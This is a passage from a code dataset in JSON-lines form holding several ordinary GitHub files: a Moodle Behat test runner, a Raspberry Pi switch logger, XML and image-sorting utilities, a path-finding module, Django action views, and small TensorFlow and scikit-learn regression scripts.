url.read().decode('utf-8')\n matches = sorted(re.findall(r'[a-z0-9._-]+/selenium-server-standalone-[0-9.]+\\.jar', content, re.I),\n key=natural_sort_key)\n if len(matches) > 0:\n seleniumUrl = seleniumStorageUrl + matches[-1]\n logging.info('Downloading Selenium from %s' % seleniumUrl)\n if (logging.getLogger().level <= logging.INFO):\n urllib.request.urlretrieve(seleniumUrl, seleniumPath, downloadProcessHook)\n # Force a new line after the hook display\n logging.info('')\n else:\n urllib.request.urlretrieve(seleniumUrl, seleniumPath)\n else:\n logging.warning('Could not locate Selenium server to download')\n\n if not nojavascript and not os.path.isfile(seleniumPath):\n raise Exception('Selenium file %s does not exist')\n\n # Run cli\n try:\n\n # If Oracle, ask the user for a Behat prefix, if not set.\n prefix = M.get('behat_prefix')\n if M.get('dbtype') == 'oci' and (args.force or not prefix or len(prefix) > 2):\n while not prefix or len(prefix) > 2:\n prefix = question('What prefix would you like to use? (Oracle, max 2 chars)')\n else:\n prefix = None\n\n outputDir = self.Wp.getExtraDir(M.get('identifier'), 'behat')\n outpurUrl = self.Wp.getUrl(M.get('identifier'), extra='behat')\n\n logging.info('Initialising Behat, please be patient!')\n M.initBehat(switchcompletely=args.switchcompletely, force=args.force, prefix=prefix, faildumppath=outputDir)\n logging.info('Behat ready!')\n\n # Preparing Behat command\n cmd = ['vendor/bin/behat']\n if args.tags:\n cmd.append('--tags=\"%s\"' % (args.tags))\n\n if args.testname:\n cmd.append('--name=\"%s\"' % (args.testname))\n\n if not (args.tags or args.testname) and nojavascript:\n cmd.append('--tags ~@javascript')\n\n if args.faildump:\n if M.branch_compare(31, '<'):\n cmd.append('--format=\"progress,progress,pretty,html,failed\"')\n cmd.append('--out=\",{0}/progress.txt,{0}/pretty.txt,{0}/status.html,{0}/failed.txt\"'.format(outputDir))\n else:\n cmd.append('--format=\"moodle_progress\" --out=\"std\"')\n cmd.append('--format=\"progress\" --out=\"{0}/progress.txt\"'.format(outputDir))\n cmd.append('--format=\"pretty\" --out=\"{0}/pretty.txt\"'.format(outputDir))\n\n configcandidates = ['%s/behat/behat.yml' % (M.get('behat_dataroot'))]\n if M.branch_compare(32):\n # Since Moodle 3.2.2 behat directory is kept under $CFG->behat_dataroot for single and parallel runs.\n configcandidates.insert(0, '%s/behatrun/behat/behat.yml' % (M.get('behat_dataroot')))\n\n cmd.append('--config=%s' % (list(filter(os.path.isfile, configcandidates))[0]))\n\n # Checking feature argument\n if args.feature:\n filepath = args.feature\n if not filepath.startswith('/'):\n filepath = os.path.join(M.get('path'), filepath)\n cmd.append(filepath)\n\n cmd = ' '.join(cmd)\n\n phpCommand = '%s -S localhost:8000' % (self.C.get('php'))\n seleniumCommand = None\n if seleniumPath:\n seleniumCommand = '%s -jar %s' % (self.C.get('java'), seleniumPath)\n\n olderThan26 = M.branch_compare(26, '<')\n\n if args.run:\n logging.info('Preparing Behat testing')\n\n # Preparing PHP Server\n phpServer = None\n if olderThan26 and not M.get('behat_switchcompletely'):\n logging.info('Starting standalone PHP server')\n kwargs = {}\n kwargs['cwd'] = M.get('path')\n phpServer = ProcessInThread(phpCommand, **kwargs)\n phpServer.start()\n\n # Launching Selenium\n seleniumServer = None\n if seleniumPath and not nojavascript:\n logging.info('Starting Selenium server')\n kwargs = {}\n if args.seleniumverbose:\n kwargs['stdout'] = None\n kwargs['stderr'] = None\n else:\n # Logging Selenium to a temporary file, 
this can be useful, and also it appears\n # that Selenium hangs when stderr is not buffered.\n fileOutPath = os.path.join(gettempdir(), 'selenium_%s_out.log' % (M.get('identifier')))\n fileErrPath = os.path.join(gettempdir(), 'selenium_%s_err.log' % (M.get('identifier')))\n tmpfileOut = open(fileOutPath, 'w')\n tmpfileErr = open(fileErrPath, 'w')\n logging.debug('Logging Selenium output to: %s' % (fileOutPath))\n logging.debug('Logging Selenium errors to: %s' % (fileErrPath))\n kwargs['stdout'] = tmpfileOut\n kwargs['stderr'] = tmpfileErr\n seleniumServer = ProcessInThread(seleniumCommand, **kwargs)\n seleniumServer.start()\n\n logging.info('Running Behat tests')\n\n # Sleep for a few seconds before starting Behat\n if phpServer or seleniumServer:\n launchSleep = int(self.C.get('behat.launchSleep'))\n logging.debug('Waiting for %d seconds to allow Selenium and/or the PHP Server to start ' % (launchSleep))\n sleep(launchSleep)\n\n # Running the tests\n try:\n if args.faildump:\n logging.info('More output can be found at:\\n %s\\n %s', outputDir, outpurUrl)\n process(cmd, M.path, None, None)\n except KeyboardInterrupt:\n pass\n\n # Kill the remaining processes\n if phpServer and phpServer.is_alive():\n phpServer.kill()\n if seleniumServer and seleniumServer.is_alive():\n seleniumServer.kill()\n\n # Disable Behat\n if args.disable:\n self.disable(M)\n\n else:\n if args.faildump:\n logging.info('More output will be accessible at:\\n %s\\n %s', outputDir, outpurUrl)\n if olderThan26:\n logging.info('Launch PHP Server (or set $CFG->behat_switchcompletely to True):\\n %s' % (phpCommand))\n if seleniumCommand:\n logging.info('Launch Selenium (optional):\\n %s' % (seleniumCommand))\n logging.info('Launch Behat:\\n %s' % (cmd))\n\n except Exception as e:\n raise e\n\n def disable(self, M):\n logging.info('Disabling Behat')\n M.cli('admin/tool/behat/cli/util.php', '--disable')\n M.removeConfig('behat_switchcompletely')\n","repo_name":"FMCorz/mdk","sub_path":"mdk/commands/behat.py","file_name":"behat.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"84"} +{"seq_id":"39558752080","text":"import requests\nimport time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BOARD)\nswitch = 3\nGPIO.setup(switch, GPIO.IN)\n\nfor x in range(0, 10000000):\n if (GPIO.input(switch)) == True:\n\n requests.post('http://192.168.30.1/workshop/submit.php', data = {\n 'value': 1\n })\n else: \n\t requests.post('http://192.168.30.1/workshop/submit.php', data = {\n\t 'value': 0\n\t })\n\n time.sleep(0.01)\n\nGPIO.cleanup()\n","repo_name":"shakdwipeea/workshop-raspberry-pi","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"14855110340","text":"\"\"\"\n使用python xml解析树解析xml文件,批量修改xml文件里object节点下name节点的text\n\"\"\"\nimport glob\nimport xml.etree.ElementTree as ET\npath = r'D:\\zsh\\biaozhu\\bilibli\\download\\table_tennis\\badminton\\bo\\new_xml' # xml文件夹路径\ni = 0\nfor xml_file in glob.glob(path + '/*.xml'):\n # print(xml_file)\n tree = ET.parse(xml_file)\n obj_list = tree.getroot().findall('object')\n for per_obj in obj_list:\n pre = per_obj[1]\n if per_obj[0].text == 'volant': # 错误的标签“33”\n per_obj[0].text = 'shuttle' # 修改成“44”\n i = i+1\n\n 
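[Editor's aside] The Chinese docstring of the label-renaming script above says: "use Python's XML parse tree to parse XML files and batch-edit the text of the name node under each object node" (the inline comments mark "the wrong label" and "change it to"). A hedged variant that looks the child up by tag instead of position, so reordered <object> children do not break it:

import glob
import xml.etree.ElementTree as ET

def rename_labels(xml_dir, old='volant', new='shuttle'):
    count = 0
    for xml_file in glob.glob(xml_dir + '/*.xml'):
        tree = ET.parse(xml_file)
        for obj in tree.getroot().iter('object'):
            name = obj.find('name')          # by tag, not obj[0]
            if name is not None and name.text == old:
                name.text = new
                count += 1
        tree.write(xml_file)
    return count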
tree.write(xml_file)\nprint('共完成了{}处替换'.format(i))\n","repo_name":"zsh123abc/untils","sub_path":"utils/修改标签名/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"18458860300","text":"__author__ = 'Eleftherios Anagnostopoulos'\n__email__ = 'eanagnostopoulos@hotmail.com'\n__credits__ = [\n 'Azadeh Bararsani (Senior Researcher at Ericsson AB) - email: azadeh.bararsani@ericsson.com'\n 'Aneta Vulgarakis Feljan (Senior Researcher at Ericsson AB) - email: aneta.vulgarakis@ericsson.com'\n]\n\n\nclass MultiplePathsNode(object):\n def __init__(self, osm_id):\n self.osm_id = osm_id\n self.followed_paths = []\n\n def __str__(self):\n return str(self.osm_id)\n\n def add_followed_path(self, followed_path):\n if followed_path not in self.followed_paths:\n self.followed_paths.append(followed_path)\n\n def get_followed_paths(self):\n return self.followed_paths\n\n def update_followed_paths(self, followed_paths_of_previous_node):\n if len(followed_paths_of_previous_node) > 0:\n for followed_path_of_previous_node in followed_paths_of_previous_node:\n followed_path = followed_path_of_previous_node + [self.osm_id]\n self.add_followed_path(followed_path=followed_path)\n else:\n followed_path = [self.osm_id]\n self.followed_paths.append(followed_path)\n\n\nclass MultiplePathsSet(object):\n \"\"\"\n Following the principles of breadth-first search, the neighbors of each node are explored first,\n before moving to the next level neighbors. For this reason, a data storing structure is implemented\n in order to store the nodes whose neighbors have not yet been explored.\n \"\"\"\n def __init__(self):\n self.node_osm_ids = []\n self.nodes = []\n\n def __len__(self):\n return len(self.node_osm_ids)\n\n def __contains__(self, node_osm_id):\n \"\"\"\n Check if a node exists in the nodes list.\n\n :type node_osm_id: integer\n :return: boolean\n \"\"\"\n return node_osm_id in self.node_osm_ids\n\n def __str__(self):\n return str(self.node_osm_ids)\n\n def push(self, new_node):\n \"\"\"\n Insert a new node.\n\n :param new_node: MultiplePathsNode\n \"\"\"\n new_node_osm_id = new_node.osm_id\n self.node_osm_ids.append(new_node_osm_id)\n self.nodes.append(new_node)\n\n def pop(self):\n \"\"\"\n Remove - retrieve the first node of followed path.\n\n :return: node: MultiplePathsNode\n \"\"\"\n node = self.nodes.pop(0)\n self.node_osm_ids.remove(node.osm_id)\n return node\n\n\ndef get_edge(starting_node, ending_node, edges_dictionary):\n \"\"\"\n Get the edge_document which connects starting_node with ending_node.\n\n :param starting_node: osm_id\n :param ending_node: osm_id\n\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: edge: edge_document\n \"\"\"\n edge = None\n starting_node_edges = edges_dictionary[starting_node]\n\n for starting_node_edge in starting_node_edges:\n if starting_node_edge.get('ending_node').get('osm_id') == ending_node:\n edge = starting_node_edge\n break\n\n return edge\n\n\ndef identify_all_paths(starting_node_osm_id, ending_node_osm_id, edges_dictionary):\n \"\"\"\n This function is capable of identifying all the possible paths connecting the\n starting with the ending node, implementing a variation of the Breadth-first\n search algorithm. Each path is represented by a list of edge_documents (waypoints),\n including details about intermediate nodes, maximum allowed speed, road type, and\n current levels of traffic density. 
The returned value of the function is a\n double list of edge_documents.\n\n :param starting_node_osm_id: integer\n :param ending_node_osm_id: integer\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: waypoints: [[edge_document]]\n \"\"\"\n # Returned value\n waypoints = []\n\n # A data storing structure used in order to keep the nodes\n # whose neighbors should be considered.\n open_set = MultiplePathsSet()\n\n # A dictionary ({node_osm_id -> node}) containing nodes\n # whose neighbors have already been considered.\n closed_set = {}\n\n # starting_node is initialized and pushed into the open_set.\n starting_node = MultiplePathsNode(osm_id=starting_node_osm_id)\n starting_node.followed_paths = [[starting_node.osm_id]]\n open_set.push(new_node=starting_node)\n\n # The node in the first position of the open_set is retrieved,\n # as long as the number of stored nodes is above zero.\n while len(open_set) > 0:\n current_node = open_set.pop()\n\n # Continuation condition: ending_node has been discovered.\n if current_node.osm_id == ending_node_osm_id:\n\n # Each one of the followed paths is processed, in order to retrieve the\n # corresponding edge_documents, and added to the returned double list.\n for followed_path in current_node.get_followed_paths():\n waypoints.append(process_followed_path(\n followed_path=followed_path,\n edges_dictionary=edges_dictionary)\n )\n\n current_node.followed_paths = []\n continue\n\n # Continuation condition: current_node is ignored in case it has no neighbors,\n # or its neighbors have already been considered.\n if current_node.osm_id not in edges_dictionary or current_node.osm_id in closed_set:\n continue\n\n # Following the edges of current_node, each one of its neighbors is considered.\n for edge in edges_dictionary.get(current_node.osm_id):\n next_node_osm_id = edge.get('ending_node').get('osm_id')\n\n # Continuation condition: next_node has already been considered.\n if next_node_osm_id in closed_set:\n continue\n else:\n # Followed paths of next_node are updated and the node is pushed into the open_set,\n # so as to allow its neighbors to be considered.\n next_node = MultiplePathsNode(osm_id=next_node_osm_id)\n next_node.update_followed_paths(followed_paths_of_previous_node=current_node.get_followed_paths())\n open_set.push(new_node=next_node)\n\n # Since all its neighbors have been considered, current_node is added to the closed_set.\n closed_set[current_node.osm_id] = current_node\n\n return waypoints\n\n\ndef process_followed_path(followed_path, edges_dictionary):\n \"\"\"\n This function is able to process the nodes of followed_path and\n identify the edge_documents which connect them.\n\n :param followed_path: [osm_id]\n :param edges_dictionary: {starting_node_osm_id -> [edge_document]}\n :return: detailed_followed_path: [edge_document]\n \"\"\"\n detailed_followed_path = []\n\n for i in range(0, len(followed_path) - 1):\n starting_node = followed_path[i]\n ending_node = followed_path[i + 1]\n edge = get_edge(starting_node=starting_node, ending_node=ending_node, edges_dictionary=edges_dictionary)\n # path_entry = {'edge_id': edge.get('_id'), 'starting_node': starting_node, 'ending_node': ending_node}\n detailed_followed_path.append(edge)\n\n return 
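[Editor's aside] A hedged usage sketch of identify_all_paths with a toy edges_dictionary; the edge documents are reduced to the single field the finder and get_edge actually read ('ending_node' -> 'osm_id'):

edges = {
    1: [{'ending_node': {'osm_id': 2}}, {'ending_node': {'osm_id': 3}}],
    2: [{'ending_node': {'osm_id': 4}}],
    3: [{'ending_node': {'osm_id': 4}}],
}
paths = identify_all_paths(1, 4, edges)
# Expected: two waypoint lists, one via node 2 and one via node 3.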
detailed_followed_path\n","repo_name":"pinac0099/dynamic-bus-scheduling","sub_path":"src/route_generator/multiple_paths_finder.py","file_name":"multiple_paths_finder.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"84"} +{"seq_id":"13534104982","text":"import numpy as np\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport pandas as pd\n# importing shutil module \nimport shutil\n\n# ---- Script that moves unused images from the stimuli folder to the additional_pictures folder ---- #\n# From a set of images contained in the stimuli folder, we will keep only those that are present in the csv file \n# containing the conditions of the experiment. \n# Unused images will be moved to the additional_pictures folder.\n\n#File with the name of the images that will stay in the stimuli folder.\ncsvName= '/PicBADEconditions_Eng.csv'\n\n#File with the name of the images that will stay in the stimuli folder.\ncsvName2= '/PicBADEconditions_practice_Eng.csv'\n\n#String to the current path\nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__)) \n\n#Path to stimuli folder\nmypath = THIS_FOLDER+\"/stimuli/\" #string to the path of edf files\n\n#Path where we gonna move the pictures that are not used\notherPic = THIS_FOLDER+\"/additional_pictures/\" #string to the path of edf files\n\n\n#Get list of pictures, that will be used, from the conditions file\ndef GetListPictures(filePath):\n df = pd.read_csv(filePath).fillna(0)\n arr = np.array(df[['img_1','img_2','img_3']])\n arr = np.reshape(arr,(arr.shape[0]*arr.shape[1]))\n arr.sort()\n return arr\n #print(\"List of desired pictures: \", arr)\n\narr1 = GetListPictures(THIS_FOLDER+csvName)\narr2 = GetListPictures(THIS_FOLDER+csvName2)\narr = np.append(arr1,arr2)\n\n#Get list of all pictures that are currently in the stimuli folder\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nonlyfiles.sort()\n#print(\"List of all pictures\",onlyfiles)\n\n#Move pictures that are not in the conditions file\nfor i in range(len(onlyfiles)):\n myPic = mypath+onlyfiles[i] #string path to the file\n namePic = \"stimuli/\"+onlyfiles[i]\n if namePic not in arr:\n # Move the content of \n # # source to destination \n shutil.move(myPic, otherPic)\n\nprint(\"Done\")","repo_name":"carodak/BADE-Images-Pre","sub_path":"extract_pictures.py","file_name":"extract_pictures.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16725782069","text":"from datetime import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Q\nfrom django.http.response import Http404, HttpResponseRedirect\nfrom django.urls.base import reverse, reverse_lazy\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import gettext as _\nfrom django.views import View\nfrom django.views.generic import CreateView, DetailView, ListView\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic.edit import DeletionMixin, UpdateView\n\nfrom aldryn_apphooks_config.mixins import AppConfigMixin\nfrom aldryn_apphooks_config.utils import get_app_instance\nfrom cms.models import Page\nfrom privates.views import PrivateMediaView\nfrom view_breadcrumbs import BaseBreadcrumbMixin\n\nfrom open_inwoner.cms.collaborate.cms_apps import CollaborateApphook\nfrom 
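[Editor's aside] extract_pictures.py above flattens the three image columns through numpy and then scans the array with `in` for every file, an O(n) lookup each time. A hedged sketch doing the same with a set (CSV layout and column names taken from the script):

import pandas as pd

def pictures_to_keep(csv_path):
    df = pd.read_csv(csv_path).fillna(0)
    # One set with O(1) membership instead of a sorted numpy array.
    return set(df[['img_1', 'img_2', 'img_3']].to_numpy().ravel())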
open_inwoner.components.utils import RenderableTag\nfrom open_inwoner.htmx.views import HtmxTemplateTagModelFormView\nfrom open_inwoner.utils.logentry import get_verbose_change_message\nfrom open_inwoner.utils.mixins import ExportMixin\nfrom open_inwoner.utils.views import CommonPageMixin, LogMixin\n\nfrom ..forms import ActionForm, ActionListForm\nfrom ..models import Action\n\n\nclass ActionsEnabledMixin(AppConfigMixin):\n def dispatch(self, request, *args, **kwargs):\n self.namespace, self.config = get_app_instance(request)\n request.current_app = self.namespace\n\n if self.config and not self.config.actions:\n raise Http404(\"actions not enabled\")\n\n return super().dispatch(request, *args, **kwargs)\n\n\nclass BaseActionFilter:\n \"\"\"\n For when in the template the action tag is used. This will filter the actions correctly.\n \"\"\"\n\n def get_actions(self, actions):\n if self.request.GET.get(\"end_date\"):\n end_date = datetime.strptime(\n self.request.GET.get(\"end_date\"), \"%d-%m-%Y\"\n ).date()\n actions = actions.filter(end_date=end_date)\n if self.request.GET.get(\"is_for\"):\n actions = actions.filter(is_for=self.request.GET.get(\"is_for\"))\n if self.request.GET.get(\"status\"):\n actions = actions.filter(status=self.request.GET.get(\"status\"))\n return actions\n\n\nclass ActionListView(\n ActionsEnabledMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n BaseActionFilter,\n ListView,\n):\n template_name = \"pages/profile/actions/list.html\"\n model = Action\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return (\n base_qs.visible().connected(user=self.request.user).select_related(\"is_for\")\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"action_form\"] = ActionListForm(\n data=self.request.GET,\n users=self.get_queryset().values_list(\"is_for_id\", flat=True),\n )\n\n actions = self.get_actions(self.get_queryset())\n paginator, page, queryset, is_paginated = self.paginate_queryset(actions, 10)\n context[\"paginator\"] = paginator\n context[\"page_obj\"] = page\n context[\"is_paginated\"] = is_paginated\n context[\"actions\"] = queryset\n context[\"show_plans\"] = (\n Page.objects.published()\n .filter(application_namespace=CollaborateApphook.app_name)\n .exists()\n )\n\n return context\n\n\nclass ActionUpdateView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n UpdateView,\n):\n template_name = \"pages/profile/actions/edit.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n form_class = ActionForm\n success_url = reverse_lazy(\"profile:action_list\")\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"Bewerk {}\").format(self.object.name),\n reverse(\"profile:action_edit\", kwargs=self.kwargs),\n ),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update(user=self.request.user)\n return kwargs\n\n def form_valid(self, form):\n self.object = form.save(self.request.user)\n\n # log if the action was changed\n if form.changed_data:\n changed_message = 
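[Editor's aside] The views in this file lean on two custom queryset methods, visible() and connected(). A hedged sketch of what they plausibly look like, inferred from how the views filter and from the is_deleted flag set in ActionDeleteView below; the real manager lives elsewhere in open_inwoner:

from django.db import models
from django.db.models import Q

class ActionQuerySet(models.QuerySet):
    def visible(self):
        # Mirrors the soft-delete flag toggled by ActionDeleteView.
        return self.filter(is_deleted=False)

    def connected(self, user):
        return self.filter(Q(is_for=user) | Q(created_by=user))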
get_verbose_change_message(form=form)\n self.log_change(self.object, changed_message)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ActionUpdateStatusTagView(\n LogMixin, LoginRequiredMixin, HtmxTemplateTagModelFormView\n):\n model = Action\n fields = (\"status\",)\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n template_tag = RenderableTag(\"action_tags\", \"action_status_button\")\n raise_exception = True\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_template_tag_args(self, context):\n args = super().get_template_tag_args(context)\n args.update(\n action=context[\"action\"],\n )\n return args\n\n def form_valid(self, form):\n self.object = form.save()\n\n # log if the action was changed\n if form.changed_data:\n changed_message = get_verbose_change_message(form=form)\n self.log_change(self.object, changed_message)\n\n return self.get_response()\n\n\nclass ActionDeleteView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n DeletionMixin,\n SingleObjectMixin,\n View,\n):\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n success_url = reverse_lazy(\"profile:action_list\")\n raise_exception = True\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def delete(self, request, *args, **kwargs):\n self.object = self.get_object()\n # soft-delete\n self.object.is_deleted = True\n self.object.save()\n\n self.on_delete_action(self.object)\n\n return HttpResponseRedirect(self.get_success_url())\n\n def on_delete_action(self, action):\n self.log_deletion(\n action,\n _(\"action soft-deleted by user {user}\").format(user=self.request.user),\n )\n messages.add_message(\n self.request,\n messages.SUCCESS,\n _(\"Actie '{action}' is verwijdered.\").format(action=action),\n )\n\n\nclass ActionCreateView(\n ActionsEnabledMixin,\n LogMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n CreateView,\n):\n template_name = \"pages/profile/actions/edit.html\"\n model = Action\n form_class = ActionForm\n success_url = reverse_lazy(\"profile:action_list\")\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"Maak actie aan\"),\n reverse(\"profile:action_create\"),\n ),\n ]\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs.update(user=self.request.user)\n return kwargs\n\n def form_valid(self, form):\n self.object = form.save(self.request.user)\n\n self.log_addition(self.object, _(\"action was created\"))\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ActionListExportView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, ExportMixin, ListView\n):\n template_name = \"export/profile/action_list_export.html\"\n model = Action\n\n def get_filename(self):\n return \"actions.pdf\"\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return (\n base_qs.visible()\n .filter(Q(is_for=self.request.user) | Q(created_by=self.request.user))\n .select_related(\"created_by\")\n )\n\n\nclass ActionExportView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, ExportMixin, DetailView\n):\n template_name = \"export/profile/action_export.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().filter(\n 
Q(is_for=self.request.user) | Q(created_by=self.request.user)\n )\n\n\nclass ActionPrivateMediaView(\n ActionsEnabledMixin, LogMixin, LoginRequiredMixin, PrivateMediaView\n):\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n file_field = \"file\"\n\n def get_queryset(self):\n return super().get_queryset().visible()\n\n def has_permission(self):\n action = self.get_object()\n if self.request.user.is_superuser or self.request.user in [\n action.created_by,\n action.is_for,\n ]:\n self.log_user_action(action, _(\"file was downloaded\"))\n return True\n\n return False\n\n\nclass ActionHistoryView(\n ActionsEnabledMixin,\n LoginRequiredMixin,\n CommonPageMixin,\n BaseBreadcrumbMixin,\n DetailView,\n):\n template_name = \"pages/history.html\"\n model = Action\n slug_field = \"uuid\"\n slug_url_kwarg = \"uuid\"\n\n @cached_property\n def crumbs(self):\n return [\n (_(\"Mijn profiel\"), reverse(\"profile:detail\")),\n (_(\"Mijn acties\"), reverse(\"profile:action_list\")),\n (\n _(\"History of {}\").format(self.object.name),\n reverse(\"profile:action_history\", kwargs=self.kwargs),\n ),\n ]\n\n def get_queryset(self):\n base_qs = super().get_queryset()\n return base_qs.visible().connected(user=self.request.user)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"logs\"] = self.object.logs.order_by()\n return context\n","repo_name":"maykinmedia/open-inwoner","sub_path":"src/open_inwoner/accounts/views/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":10412,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"28573776698","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport itertools\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\nCOLUMNS = [\"Q1\", \"Q2\", \"Q3\", \"Q4\", \"Q5\", \"Q6\",\n \"Q7\", \"Q8\", \"Q9\", \"Q10\", \"gender\", \"age\", \"personality\"]\nFEATURES = [\"Q1\", \"Q2\", \"Q3\", \"Q4\", \"Q5\", \"Q6\",\n \"Q7\", \"Q8\", \"Q9\", \"Q10\", \"gender\", \"age\"]\nLABEL = \"personality\"\n\n\ndef input_fn(data_set):\n feature_cols = {k: tf.constant(data_set[k].values) for k in FEATURES}\n labels = tf.constant(data_set[LABEL].values)\n return feature_cols, labels\n\n\n\ndef main():\n # Load datasets\n training_set = pd.read_csv(\"training.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n test_set = pd.read_csv(\"test.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n\n\n # Passing user's input\n prediction_set = pd.read_csv(\"prediction.csv\", skipinitialspace=True,\n skiprows=1, names=COLUMNS)\n\n # Feature cols\n feature_cols = [tf.contrib.layers.real_valued_column(k)\n for k in FEATURES]\n\n # Build 2 layer fully connected DNN with 13, 13 units respectively.\n regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols,\n hidden_units=[13, 13],\n model_dir=\"trained_values/\")\n\n # Fit\n regressor.fit(input_fn=lambda: input_fn(training_set), steps=5000)\n\n\n # Score accuracy\n ev = regressor.evaluate(input_fn=lambda: input_fn(test_set), steps=1)\n loss_score = ev[\"loss\"]\n print(\"Loss: {0:f}\".format(loss_score))\n\n # Print out predictions\n y = regressor.predict(input_fn=lambda: input_fn(prediction_set))\n\n\n # .predict() returns an iterator; convert to a list and print predictions\n\n prediction = list(itertools.islice(y, 1))\n return 
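[editor's note] One fragility worth flagging in the Django views record above: BaseActionFilter.get_actions feeds the raw end_date query parameter straight to datetime.strptime, so a malformed date in the URL raises ValueError and surfaces as a server error. A minimal hardened sketch, assuming the same Action fields and mixin usage as in the record — the _parse_date helper and the HardenedActionFilter name are illustrative, not part of the project:

from datetime import datetime

def _parse_date(raw, fmt="%d-%m-%Y"):
    # Return a date, or None when the parameter is absent or malformed,
    # instead of letting ValueError bubble up as a 500.
    try:
        return datetime.strptime(raw, fmt).date()
    except (TypeError, ValueError):
        return None

class HardenedActionFilter:
    def get_actions(self, actions):
        end_date = _parse_date(self.request.GET.get("end_date"))
        if end_date:
            actions = actions.filter(end_date=end_date)
        for param in ("is_for", "status"):
            value = self.request.GET.get(param)
            if value:
                actions = actions.filter(**{param: value})
        return actions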
prediction","repo_name":"SimuliChina/personalityclassification","sub_path":"personality.py","file_name":"personality.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21407646373","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 17 09:22:57 2023\n\n@author: labo2023\n\"\"\"\n\nimport pandas as pd\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n\nru = [0,50,100,200,300,400,500,750,1000,1250,1750]\ndi = [104,106,112.3,117,115.3,117.5,130.22,139.8,140.6,154.12,170.5]\n\ndi2 = [105.62,109,109.37,110.71,116.17,120.25,120.57,133.46,146.62,155.03,171.61]\n\ndatos = pd.DataFrame({'RU': ru, 'DI': di})\n\n\nx = pd.DataFrame(datos['RU'])\ny = pd.DataFrame(datos['DI'])\n\nmodel = linear_model.LinearRegression()\n\nmodel.fit(x,y)\n\nprint(model.coef_)\nprint(model.intercept_)\n\n\nplt.scatter(x,y,color='lightpink', marker='X')\nplt.plot(x, model.predict(x), color='crimson', linewidth=2)\nplt.xlabel('Dosis de RU (ug/huevo)')\nplt.ylabel('Indice de daño')\nplt.show()\n\n\ndata = pd.DataFrame({'RU': ru, 'DI': di2})\nx = pd.DataFrame(data['RU'])\ny = pd.DataFrame(data['DI'])\nmodel = linear_model.LinearRegression()\n\nmodel.fit(x,y)\npendiente = model.coef_\nordenada = model.intercept_\nR2 = 